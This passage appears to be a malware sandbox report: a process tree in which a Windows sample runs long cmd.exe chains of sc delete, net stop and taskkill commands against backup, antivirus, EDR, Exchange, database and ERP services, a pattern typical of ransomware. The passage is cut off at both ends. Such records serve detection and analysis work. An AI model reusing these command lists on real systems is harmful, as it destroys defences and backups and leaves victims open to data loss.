C:\Windows\SysWOW64\sc.exesc delete RTCASMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete FTA5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MASTER5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete NscAuthService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMUnzipService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService$maintenance5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete REPLICA5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCATS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCAVMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RtcQms5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCMEETINGMCU5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCIMMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCDATAMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCCDR5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectEventService165⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectQueueService165⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete SPAdminV45⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete SPSearchHostController5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SPTimerV45⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SPTraceV45⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OSearch165⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectCalcService165⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete c2wts5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete AppFabricCachingService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete ADWS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoard575⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoardRCService575⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vsvnjobsvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VisualSVNServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "FlexNet Licensing Service 64"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete BestSyncSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete LPManager5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MediatekRegistryWriter5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete RaAutoInstSrv_RT28705⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup105⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLANYs_sem55⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CASLicenceServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete semwebsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TbossSystem5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ErpEnvSvc5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.DispatchService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.UpdateService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Config.WindowsService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.DataCenterService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.SchedulingService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Setup.InstallService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MysoftUpdate5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete edr_monitor5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete abs_deployer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete savsvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxMonitorService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CloudExchangeService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService2"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CIS5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete EASService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete KICkSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SmsSrv5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete OfficeClearCache5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete TurboCRM705⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8DispatchService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete U8EISService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8EncryptService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete U8GCService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8KeyManagePool5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8MPool"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SCMPool5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SLReportService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8TaskService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WebPool"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UFAllNet5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete UFReportService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UTUService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService1"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT.exe /F & @net stop UFNet & @taskkill /IM MessageNotification.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete cbVSCService11 & @sc delete CobianBackup11"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ReportingServicesService.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQL Server Reporting Services"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM U8CEServer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ServerNT.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\net.exenet stop UFNet5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFNet6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MessageNotification.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cbVSCService11.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cbService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\sc.exesc delete cbVSCService115⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup115⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"4⤵
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService15⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService16⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService25⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService26⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "memcached Server"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "memcached Server"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.45⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.46⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFIDAWebService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFIDAWebService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSComplianceAudit5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSComplianceAudit6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeCompliance5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeCompliance6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDagMgmt5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDagMgmt6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDelivery5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDelivery6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDiagnostics5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDiagnostics6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFastSearch5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFastSearch6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFrontEndTransport5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFrontEndTransport6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHM5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL20085⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL20086⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHMRecovery5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHMRecovery6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap45⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap46⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIMAP4BE5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIMAP4BE6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxAssistants5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxAssistants6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeNotificationsBroker5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeNotificationsBroker6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePop35⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePop36⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePOP3BE5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePOP3BE6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRepl5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRepl6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRPC5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRPC6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeServiceHost5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeServiceHost6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSubmission5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSubmission6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeThrottling5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeThrottling6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeTransport5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeTransport6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeTransportLogSearch5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeTransportLogSearch6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeUM5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeUM6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeUMCR5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeUMCR6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL5_OA5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL5_OA6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"4⤵
-
C:\Windows\SysWOW64\net.exenet stop HaoZipSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HaoZipSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "igfxCUIService2.0.0.0"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Realtek11nSU5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Realtek11nSU6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop xenlite5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xenlite6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop XenSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop XenSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.25⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.26⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Synology Drive VSS Service x64"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Synology Drive VSS Service x64"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DellDRLogSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DellDRLogSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop FirebirdGuardianDeafaultInstance5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWEM3DBAUTORun5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWEM3DBAUTORun6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWRinfoClientService5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Service25⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Service26⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RapidRecoveryAgent5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapidRecoveryAgent6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AdobeARMservice5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AdobeARMservice6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeanBackupSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeanBackupSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdWebService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdWebService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamNFSSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploySvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCloudSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamMountSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamBrokerSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDistributionSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDistributionSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop tmlisten5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ServiceMid5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceMid6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop 360EntPGSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop 360EntPGSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ClickToRunSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ClickToRunSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RavTask5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RavTask6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AngelOfDeath5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AngelOfDeath6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop d_safe5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop d_safe6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFLicenceServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFLicenceServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetVault Process Manager"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetVault Process Manager"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RavService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RavService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DFServ5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DFServ6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop IngressMgr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IngressMgr6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop EvtSys5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EvtSys6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3ClouManager5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3ClouManager6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFVPrintServer5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""4⤵
-
C:\Windows\SysWOW64\net.exenet stop UIODetect5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UIODetect6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMwareHostd5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMwareHostd6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer85⤵
- Discovers systems in the same network
-
